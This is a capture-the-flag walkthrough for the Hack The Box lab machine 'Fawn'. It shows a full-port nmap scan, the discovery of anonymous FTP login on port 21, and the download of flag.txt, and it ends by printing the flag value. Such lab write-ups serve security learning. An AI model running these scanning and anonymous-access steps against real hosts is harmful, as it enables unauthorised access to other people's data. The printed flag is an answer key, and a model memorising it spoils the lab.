Fawn
Port recognition withnmapor you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon fawn.htb
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
B.O.T.N.E.T. created by Binlaab
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-19 11:41 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:41
Completed NSE at 11:41, 0.00s elapsed
Initiating Ping Scan at 11:41
Scanning fawn.htb (10.129.184.192) [4 ports]
Completed Ping Scan at 11:41, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:41
Scanning fawn.htb (10.129.184.192) [65535 ports]
Discovered open port 21/tcp on 10.129.184.192
Completed SYN Stealth Scan at 11:42, 15.16s elapsed (65535 total ports)
NSE: Script scanning 10.129.184.192.
Initiating NSE at 11:42
Completed NSE at 11:42, 0.55s elapsed
Nmap scan report for fawn.htb (10.129.184.192)
Host is up (0.093s latency).
Not shown: 65200 closed tcp ports (reset), 334 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
NSE: Script Post-scanning.
Initiating NSE at 11:42
Completed NSE at 11:42, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 16.05 seconds
Raw packets sent: 75052 (3.302MB) | Rcvd: 71943 (2.878MB)
┌─[+] [ftp]
└─(Credentials for ftp fawn.htb:21)
[user:ftp][password:]
[user:anonymous][password:]
recon reports ftp service on port 21 and we obtain valid ftp credentials
┌──(root@ghost)-[/home/ghost]
└─# ftp fawn.htb 21
Connected to fawn.htb.
220 (vsFTPd 3.0.3)
Name (fawn.htb:ghost): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||35145|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |******************************************************************************************************************************************************| 32 11.51 KiB/s 00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.42 KiB/s)
ftp> exit
221 Goodbye.
┌──(root@ghost)-[/home/ghost]
└─# cat flag.txt
035db21c881520061c53e0536e44f815